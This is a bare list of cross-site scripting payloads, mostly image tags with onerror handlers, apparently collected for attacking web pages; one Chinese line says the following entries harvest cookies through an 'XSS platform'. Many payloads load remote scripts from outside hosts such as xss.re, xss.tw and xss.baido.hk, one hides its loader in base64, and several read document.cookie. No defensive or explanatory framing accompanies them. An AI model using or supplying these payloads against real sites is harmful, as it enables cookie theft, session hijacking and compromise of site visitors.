<img src='non-exist.jpg'onerror="alert('xss')">
<img src=# onerror=alert(123)>
<img src=# onerror=alert(document.cookie)>
The following use an XSS platform to harvest cookies:
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
<img src="#">
<img src="#">
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
<img src=x width="0" height="0"></img>
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>